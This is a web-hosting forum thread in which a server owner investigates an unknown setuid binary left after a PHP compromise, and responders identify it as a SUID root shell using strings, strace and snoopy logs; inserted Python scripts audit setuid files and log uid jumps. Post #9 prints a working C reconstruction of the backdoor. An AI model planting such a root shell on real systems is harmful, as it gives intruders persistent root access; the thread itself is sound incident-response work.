Thread: strange executable
-
11-17-2013, 07:16 PM #1 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
strange executable
Recently, one of my servers was compromised through some security hole in a PHP script (note: the server is running suPHP). I cleaned up the server but did not reinstall it. However, there is this file on the server, /usr/bin/grscnfg, for which I couldn't find any reference on the internet. This file has its permissions set to -rwsr-xr-x, so basically any user can run it. Is this something to worry about, or is this a normal file? The ctime stat on the file is around the time when the server was compromised. I uploaded this file to VirusTotal and it's clean...
Any suggestions on what to do? Should I delete the file? Any advice would be greatly appreciated, thanks!
Last edited by tonytz; 11-17-2013 at 07:20 PM.
-
11-18-2013, 07:02 AM #2 Registered User
- Join Date
- Nov 2013
- Posts
- 103
Code:
yum whatprovides '/usr/bin/grscnfg'
Code:
file /usr/bin/grscnfg
If you don't want to nuke the server I guess the "best" you can do is bring it to a rescue mode (as long as it doesn't boot from the server's own hdd) and do a thorough scan with various tools.
-
11-18-2013, 12:04 PM #3 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
Yum whatprovides shows that there are no matches. Similarly, it doesn't belong to any package according to rpm, so I just gzipped it and moved it to another folder. Not sure if this is useful to do at this stage; I reviewed the output of rpm -Va and nothing suspicious came up.
I really don't want to reinstall the server, but it looks like it will have to be done eventually. The attacker could potentially have gained root after the PHP script compromise, given that the server wasn't kept up to date with patches.
Regardless, thanks very much for the tips.
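The two checks discussed in the posts above (is the file setuid, and does any installed package claim it) are easy to automate across a whole host, which is how a defender finds the binaries an attacker dropped rather than only the one they happened to notice. The script below is an added example for this thread, not code from any poster; it assumes an RPM-based system (`rpm -qf`) with a `dpkg -S` fallback, and reports hits as UNKNOWN when neither tool is present.

```python
#!/usr/bin/env python3
"""Walk a tree, list setuid/setgid regular files and report which installed
package (if any) owns each one. Anything UNOWNED is a candidate for the kind
of review this thread describes (file, strings, rpm -Va on its neighbours).
Added example for this thread; not the posters' code."""
import os
import shutil
import stat
import subprocess
import sys
from typing import List, Tuple


def find_setid_files(root: str) -> List[str]:
    """Return regular files under root that carry the setuid or setgid bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, devices
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def owning_package(path: str) -> str:
    """Ask the package manager which package installed path.

    Returns the package name, 'UNOWNED' when nothing claims the file
    (the situation the original poster hit with rpm), or 'UNKNOWN' when
    neither rpm nor dpkg is available on this host (assumption: those are
    the only two package managers we care about)."""
    if shutil.which("rpm"):
        r = subprocess.run(["rpm", "-qf", path], capture_output=True, text=True)
        return r.stdout.strip() if r.returncode == 0 else "UNOWNED"
    if shutil.which("dpkg"):
        r = subprocess.run(["dpkg", "-S", path], capture_output=True, text=True)
        # dpkg -S prints "package: /path" on success
        return r.stdout.split(":")[0].strip() if r.returncode == 0 else "UNOWNED"
    return "UNKNOWN"


def audit(root: str = "/") -> List[Tuple[str, str]]:
    """Pair every setuid/setgid file under root with its owning package."""
    return [(p, owning_package(p)) for p in find_setid_files(root)]


if __name__ == "__main__":
    start = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, pkg in audit(start):
        flag = "" if pkg not in ("UNOWNED", "UNKNOWN") else "  <-- review"
        print(f"{path}\t{pkg}{flag}")
```

Run it as root over `/` (or a narrower tree such as `/usr` to keep it fast) and compare the UNOWNED lines against what you expect; a package-owned setuid binary still deserves `rpm -V package` to confirm the file matches the shipped one.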
-
11-18-2013, 08:01 PM #4 Junior Guru Wannabe
- Join Date
- Apr 2011
- Location
- Melbourne
- Posts
- 93
You could try running the strings program over it to see if there are any hard-coded error messages, callbacks, or HTTP endpoints. Just note this won't do much if the binary has any level of obfuscation or encryption.
Code:
strings /usr/bin/grscnfg
-
11-18-2013, 08:07 PM #5 Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Would you be willing to send it to me?
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-18-2013, 08:18 PM #6 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
Here is the entire strings output, though I'm not sure what to make of it:
[root@server src]# strings grscnfg
/lib64/ld-linux-x86-64.so.2
fff.
fffff.
l$ L
t$(L
|$0H
yjN:
0zjN:
__gmon_start__
libc.so.6
setuid
system
setgid
__libc_start_main
GLIBC_2.2.5
/lib64/ld-linux-x86-64.so.2
-
11-18-2013, 08:20 PM #7 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 08:23 PM #8 Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
steve@rack911.com
From your strings output it looks like a SUID shell which would mean you were root compromised.
Send it to me and I will confirm.
-
11-18-2013, 08:42 PM #9 Junior Guru Wannabe
- Join Date
- Apr 2011
- Location
- Melbourne
- Posts
- 93
Steven beat me to it, but those three system calls there would indicate it is a shell that runs as root.
It's probably something as simple as:
Code:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

/* Runs whatever is passed as argv[1] through /bin/sh as root,
   which is exactly what the strace output in the next post shows. */
int main (int argc, char *argv[])
{
    setuid(0);
    setgid(0);
    system(argv[1]);
    return 0;
}
-
11-18-2013, 08:47 PM #10 Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
For onlookers to this thread this is definitely a malicious file.
As you can see I am logged in as user steven:
steven@steven.com [~]# grscnfg id
uid=0(root) gid=0(root) groups=0(root),502(steven)
steven@steven.com [~]#
Nov 18 19:37:09 cpanel snoopy[7517]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/grscnfg]: grscnfg id
Nov 18 19:37:09 cpanel snoopy[7518]: [uid:0 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/id]: id
It starts off as user:
7988 0000/0502 execve("/usr/bin/grscnfg", ["/usr/bin/grscnfg", "id"], [/* 25 vars */]) = 0
7988 0000/0502 setgid(0) = 0
7988 0000/0000 setuid(0) = 0
7989 0000/0000 execve("/bin/sh", ["sh", "-c", "id"], [/* 25 vars */]) = 0
7989 0000/0000 execve("/usr/bin/id", ["id"], [/* 25 vars */]) = 0
Definitely rooted.
I would see if your openssh packages are compromised as well.
Last edited by Steven; 11-18-2013 at 08:52 PM.
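The two snoopy lines in the post above are the detection signal a defender wants: within one login session (same sid) an execve logged as uid 501 is followed by one logged as uid 0, and the program that bridged the gap was not su or sudo. The script below is an added example for this thread, not Steven's code; it parses the snoopy log format exactly as shown in his post, uses constructed sample lines modelled on it, and treats the allowlist of programs expected to raise privileges as an assumption you tune for your hosts.

```python
#!/usr/bin/env python3
"""Flag uid jumps to root inside a single session in snoopy execve logs.
Added example for this thread; not the posters' code. Log format follows the
snoopy lines in post #10; the SAMPLE_LOG lines below are constructed."""
import re
from typing import Dict, List

# One snoopy execve record, e.g.
# "... snoopy[7517]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/grscnfg]: grscnfg id"
SNOOPY_RE = re.compile(
    r"snoopy\[(?P<pid>\d+)\]: \[uid:(?P<uid>\d+) sid:(?P<sid>\d+) "
    r"tty:(?P<tty>\S+) cwd:(?P<cwd>\S+) filename:(?P<filename>\S+)\]: (?P<cmd>.*)$"
)

# Programs that legitimately take a session from a user uid to uid 0.
# Assumption: tune this to what is actually installed and permitted.
EXPECTED_ELEVATORS = {"/usr/bin/sudo", "/bin/su", "/usr/bin/su", "/usr/bin/pkexec"}

# Constructed sample: session 7471 is the pattern from the thread (grscnfg
# bridges 501 -> 0); session 7590 is a normal sudo -i and must not fire.
SAMPLE_LOG = """\
Nov 18 19:37:01 cpanel snoopy[7510]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/bin/ls]: ls -la
Nov 18 19:37:09 cpanel snoopy[7517]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/grscnfg]: grscnfg id
Nov 18 19:37:09 cpanel snoopy[7518]: [uid:0 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/id]: id
Nov 18 19:40:00 cpanel snoopy[7600]: [uid:502 sid:7590 tty:/dev/pts/1 cwd:/home/bob filename:/usr/bin/sudo]: sudo -i
Nov 18 19:40:01 cpanel snoopy[7601]: [uid:0 sid:7590 tty:/dev/pts/1 cwd:/home/bob filename:/bin/bash]: -bash
"""


def parse_snoopy(lines) -> List[Dict]:
    """Turn snoopy log lines into dicts; lines that are not snoopy records are skipped."""
    events = []
    for line in lines:
        m = SNOOPY_RE.search(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["pid"] = int(ev["pid"])
        ev["uid"] = int(ev["uid"])
        events.append(ev)
    return events


def find_uid_jumps(log_text: str) -> List[Dict]:
    """Return one finding per event where a session's uid drops to 0 and the
    previous execve in that same session was not a known elevator."""
    findings = []
    last_by_sid: Dict[str, Dict] = {}
    for ev in parse_snoopy(log_text.splitlines()):
        prev = last_by_sid.get(ev["sid"])
        if (prev is not None and prev["uid"] != 0 and ev["uid"] == 0
                and prev["filename"] not in EXPECTED_ELEVATORS):
            findings.append({
                "sid": ev["sid"],
                "from_uid": prev["uid"],
                "via": prev["filename"],   # the binary that handed out root
                "via_cmd": prev["cmd"],
                "then": ev["cmd"],         # first thing run as root
            })
        last_by_sid[ev["sid"]] = ev
    return findings


if __name__ == "__main__":
    for f in find_uid_jumps(SAMPLE_LOG):
        print(f"session {f['sid']}: uid {f['from_uid']} -> 0 via {f['via']} "
              f"({f['via_cmd']!r}), then ran {f['then']!r}")
```

Feed it your real auth log (snoopy writes to syslog by default) with `find_uid_jumps(open("/var/log/messages").read())`; each finding names the binary that granted root, which is the thing to pull for the `rpm -qf` and `strings` checks earlier in the thread.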
-
11-18-2013, 08:48 PM #11 Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
-
11-18-2013, 08:54 PM #12 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 08:56 PM #13 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 08:59 PM #14 Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
-
11-18-2013, 09:19 PM #15 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 09:34 PM #16 Registered User
- Join Date
- Nov 2013
- Posts
- 103
-
11-18-2013, 09:53 PM #17 Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
-
11-18-2013, 10:19 PM #18 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 10:47 PM #19 Junior Guru Wannabe
- Join Date
- Apr 2011
- Location
- Melbourne
- Posts
- 93
RPM only produces output if there is a verification failure, so I would hazard a guess that your sshd hasn't been compromised. Better to be safe than sorry though.
-
11-18-2013, 10:57 PM #20 Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 11:07 PM #21 Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
That is a really old rpm package.